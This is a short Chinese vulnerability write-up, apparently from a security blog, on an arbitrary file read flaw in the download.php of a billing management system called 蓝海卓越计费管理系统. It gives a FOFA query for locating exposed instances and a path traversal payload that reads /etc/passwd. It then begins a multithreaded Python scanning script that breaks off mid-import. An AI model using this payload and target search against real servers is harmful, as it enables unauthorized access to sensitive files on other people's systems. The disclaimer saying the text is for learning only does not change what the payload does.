声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

一、漏洞描述

蓝海卓越计费管理系统 download.php文件存在任意文件读取漏洞，攻击者通过 …/遍历目录可以读取到服务器上的敏感文件。

二、漏洞复现

漏洞关键字搜索
FOFA：title =="蓝海卓越计费管理系统"

漏洞位置：download.php?file=../../../../../etc/passwd

脚本检测

# -*- coding: utf-8 -*-import argparse
import sys
import requests
from multiprocessing.dummy import Pool  # 表示的是多线程reque